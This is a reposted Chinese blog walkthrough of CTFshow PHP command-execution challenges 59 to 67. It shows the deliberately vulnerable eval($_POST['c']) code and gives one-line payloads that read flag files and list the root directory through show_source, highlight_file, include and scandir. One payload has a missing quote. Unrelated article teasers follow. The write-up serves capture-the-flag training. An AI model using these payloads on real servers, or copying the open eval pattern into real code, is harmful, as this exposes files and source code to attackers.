CTFshow web(php命令执行59-67）

CTFshow web(php命令执行59-67）

article2024/11/14 14:46:45/文章来源:https://blog.csdn.net/csjjjd/article/details/136106174

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);

payload:c=show_source('flag.php');

我还是那句话：如果不知道对面过滤了啥，那就一个一个尝试

解释：在 PHP 中，show_source() 是一个内置函数，用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数，并将该文件的内容以文本形式进行输出。

下面是我的文章对命令执行常用语句的总结：来源于：一篇文章带你进阶CTF命令执行-CSDN博客

我不想太多，一个个丢进去，看那个可以就是那个

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这里还是上一个payload：

c=show_source('flag.php');

或者：c=highlight_file('flag.php');

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这题是真的离谱，这个payload已经一路过关斩将了

c=show_source('flag.php');

当然得换个绕法：

c=include('flag.php);echo $flag;

这里是文件包含然后再输出变量

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web64

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web66

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

额，这波被制裁了，不能白嫖了，那就靠实力了！

c=print_r(scandir("/"));

这里首先先翻看根目录，查看源代码，接着发现了flag.txt

c=highlight_file('/flag.txt');

知道flag在根目录下面的flag.txt直接访问就好了

web67

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还是上面那道题目的方法：

payload:c=highlight_file('/flag.txt');

真诚希望我的文章能够帮助大家,谢谢！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/385647.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

2024.2.8

2024.2.8

1. 现有文件test.c\test1.c\main.c,编写Makkefile Makefile： CCgcc EXEa.out OBJS$(patsubst %.c,%.o,$(wildcard *.c)) CFLAGS-c -oall:$(EXE)$(EXE):$(OBJS)$(CC) $^ -o $%.o:%.c$(CC) $(CFLAGS) $ $^.PHONY:cleanclean:rm $(OBJS) $(EXE) 2. C编程实现&#x…

阅读更多...

基于Java (spring-boot)的音乐管理系统

基于Java (spring-boot)的音乐管理系统

一、项目介绍播放器的前端： 1.首页：点击歌单中的音乐播放列表中的歌曲进行播放，播放时跳转播放界面，并显示歌手信息，同时会匹配歌词，把相应的歌词显示在歌词面板中。 2.暂停：当歌曲正在播放时…

阅读更多...

5G NR 信道号计算

5G NR 信道号计算

一、5G NR的频段增加带宽是增加容量和传输速率最直接的方法，目前5G最大带宽将会达到400MHz，考虑到目前频率占用情况，5G将不得不使用高频进行通信。 3GPP协议定义了从Sub6G(FR1)到毫米波(FR2)的5G目标频谱。其中FR1是5G的核心频段&#xff0…

阅读更多...

155基于matlab 的形态学权重自适应图像去噪

155基于matlab 的形态学权重自适应图像去噪

基于matlab 的形态学权重自适应图像去噪；通过串并联的滤波降噪对比图，说明并联降噪的优越性。输出降噪前后图像和不同方法的降噪情况的信噪比。程序已调通，可直接运行。 155matlab 自适应图像降噪串并联降噪 (xiaohongshu.com)

阅读更多...

QT：实现图片选择器

QT：实现图片选择器

一、效果图二、用到的类 qApp：可以快速获取到项目目录位置。 QSettings ：编写config文件，记录上次打开图片的位置，下次打开图片会从上次的位置查找图片。 QPixmap：用于图片的缩放，防止图片过小&#xff0…

阅读更多...

Java+SpringBoot+Vue：高校科研管理的技术革新

Java+SpringBoot+Vue：高校科研管理的技术革新

✍✍计算机编程指导师 ⭐⭐个人介绍：自己非常喜欢研究技术问题！专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目：有源码或者技术上的问题欢迎在评论区一起讨论交流！ ⚡⚡ Java实战 |…

阅读更多...

基于JAVA的贫困地区人口信息管理系统开源项目

基于JAVA的贫困地区人口信息管理系统开源项目

目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块2.1 人口信息管理模块2.2 精准扶贫管理模块2.3 特殊群体管理模块2.4 案件信息管理模块2.5 物资补助模块三、系统设计3.1 用例设计3.2 数据库设计3.2.1 人口表3.2.2 扶贫表3.2.3 特殊群体表3.2.4 案件表3.2.5 物资补助表四…

阅读更多...

fatal error: rtiostream_utils.h: No such file or directory, rtiostream.h

fatal error: rtiostream_utils.h: No such file or directory, rtiostream.h

fatal error: rtiostream_utils.h: No such file or directory 我的设置：

阅读更多...

Java+SpringBoot实习管理系统探秘

Java+SpringBoot实习管理系统探秘

✍✍计算机编程指导师 ⭐⭐个人介绍：自己非常喜欢研究技术问题！专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目：有源码或者技术上的问题欢迎在评论区一起讨论交流！ ⚡⚡ Java实战 |…

阅读更多...

19 删除链表的倒数第 N 个结点

19 删除链表的倒数第 N 个结点

19. 删除链表的倒数第 N 个结点中等相关标签相关企业提示给你一个链表，删除链表的倒数第 n 个结点，并且返回链表的头结点。这段代码使用了双指针的方法，其中一个指针先走 n 步，然后两个指针一起走，直到第一…

阅读更多...

【剪映】为什么要做音乐版权校验？

【剪映】为什么要做音乐版权校验？

为什么要做音乐版权校验？ 剪映模板开通同步抖音影集功能后，为了尊重原创音乐以及规避侵权风险，添加背景音乐时，建议您通过版权校验，在确定抖音拥有该音乐的版权后，此模板才可能会被同步抖音影集。

阅读更多...

【C语言进阶】深度剖析数据在内存中的存储--上

【C语言进阶】深度剖析数据在内存中的存储--上

1. C语言中的数据类型的简单介绍注：C99标准里面，定义了bool类型变量。这时，只要引入头文件stdbool.h ，就能在C语言里面正常使用bool类型。 1.1 在C语言中各类型所占内存空间的大小如下 char类型的数据类型大小为1字节即8比特位。…

阅读更多...

MySQL数据库⑨_事务（四个属性+回滚提交+隔离级别+MVCC）

MySQL数据库⑨_事务（四个属性+回滚提交+隔离级别+MVCC）

目录 1. 事务的概念和四个属性 2. 事务的支持版本 3. 事务的提交方式 4. 事务的相关演示 4.1 常规操作_回滚_提交 4.2 原子性_演示 4.3 持久性_演示 4.4 begin自动更改提交方式 4.5 单条SQL与事务的关系 5. 事务的隔离级别 5.1 四种隔离级别 5.2 查看与设置隔离级别…

阅读更多...

LeetCode、435. 无重叠区间【中等，贪心区间问题】

LeetCode、435. 无重叠区间【中等，贪心区间问题】

文章目录前言LeetCode、435. 无重叠区间【中等，贪心区间问题】题目链接及分类思路贪心、区间问题资料获取前言博主介绍：✌目前全网粉丝2W，csdn博客专家、Java领域优质创作者，博客之星、阿里云平台优质作者、专注于Java后端技…

阅读更多...

2.03 作业

2.03 作业

一、选择题 1-4 CCCB 二、填空题 1.传参 2.C 3.using namespace std 4.int i32 a>65 && a<90 5.iE6 三、编程题 3.1 f(‘A’)错误，重载函数中没有char类型 f(10, 23.4)错误，第一个参数是int，第二个是double类…

阅读更多...

【精选】java进阶——包和final

【精选】java进阶——包和final

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…

阅读更多...

【开源】JAVA+Vue.js实现高校学院网站

【开源】JAVA+Vue.js实现高校学院网站

目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块2.1 学院院系模块2.2 竞赛报名模块2.3 教育教学模块2.4 招生就业模块2.5 实时信息模块三、系统设计3.1 用例设计3.2 数据库设计3.2.1 学院院系表3.2.2 竞赛报名表3.2.3 教育教学表3.2.4 招生就业表3.2.5 实时信息表四、系…

阅读更多...

LAXCUS分布式操作系统目标：软件算力入口

LAXCUS分布式操作系统目标：软件算力入口

英伟达现在的市值相当于整个中国股市！说明了什么？ AI 大潮下，算力就是生产力，也是未来 20 年一切产业的基础，英伟达已经把住硬件算力入口，LAXCUS 分布式操作系统瞄准软件算力入口，做好了&#…

阅读更多...

Spring Boot 笔记 010 创建接口_更新用户头像

Spring Boot 笔记 010 创建接口_更新用户头像

1.1.1 usercontroller中添加updateAvatar，校验是否为url PatchMapping("updateAvatar")public Result updateAvatar(RequestParam URL String avatarUrl) {userService.updateAvatar(avatarUrl);return Result.success();} 1.1.2 userservice //更新头像…

阅读更多...

生成式人工智能（AIGC）之最全详解图解

生成式人工智能（AIGC）之最全详解图解

生成式人工智能（AIGC）之最全详解图解 1. AIGC的发展历程1.1 AIGC演化重要时间节点AIGC发展历程图OpenAI大语言模型发展进程 1.2技术推进路线 2.AIGC技术场景2.1 技术场景 3.1AIGC相关应用4.AIGC未来发展前景 1. AIGC的发展历程 AIGC（AI-Gene…

阅读更多...

最新文章